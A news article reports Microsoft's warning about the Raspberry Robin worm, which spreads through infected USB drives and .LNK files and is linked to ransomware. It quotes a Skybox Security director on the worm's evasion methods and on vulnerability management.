Microsoft has warned of a new types of malware, one that has triggered payload alerts on devices of almost 1,000 organizations since quarter 4 2022. The dangerous new code has been used to introduce ransomware.
The code is ‘Raspberry Robin’ and this unusually named worm malware has been involved in recent telecommunication attacks during December 2022. This includes telecommunication entities from Latin America, Oceania (Australia), and Europe. Raspberry Robin is typically introduced via infected removable drives, often USB devices. included Commonly the malware is associated with a ‘.LNK’ file and it is activated when this file reference is double-clicked.
Looking into this new cybersecurity threat for Digital Journal is Terry Olaes, Senior Technical Director at Skybox Security.
Olaes begins by looking at the specific threat and malware issues in general, noting: “Skybox Research Lab found that the malware industry has continuously churned an array of malicious software, including cryptojacking and ransomware programs, which increased by 75 percent and 42 percent, respectively, in 2021.”
With the recent incident, Olaes states: “Now Raspberry Robin, which caught headlines in May for its prolific worm-like spreading once a beachhead is established, has evolved its capabilities to improve detection evasion via fake payload drops if the malware detects sandboxing or being analyzed.”
Olaes’s analysis goes further into the origins of the malicious code: “This implant is also part of the larger malware ecosystem and has been observed being a part of a threat stack in several campaigns.”
In terms of how the threat becomes manifest, Olaes observes: “Threat actors often sell access to compromised networks to ransomware and malware platforms, including the recent attacks involving Clop gang, IcedID, Bumblebee and Truebot. In this recent update, Raspberry Robin has drastically improved its obfuscation layers (10 or more) and evasive capabilities, highlighting the constant innovation bad actors are able to employ while leveraging tried-and-true human behavior (inserting unknown USB drives) to establish access.”
In order to protect businesses from such incidences, Olaes recommends: “It is essential that organizations adopt a proactive approach to vulnerability management that involves evaluating the entire threat landscape to identify exposed vulnerabilities. An essential step to reducing malware is to enhance the overall maturity of an organization’s vulnerability management program to ensure prompt remediation rather than a focus on time-consuming and costly reactive activities.”
Olaes also advises: “Additionally, implementing a solution capable of quantifying the business impact of cyber risk into the economic impact will help organizations determine the level of urgency.”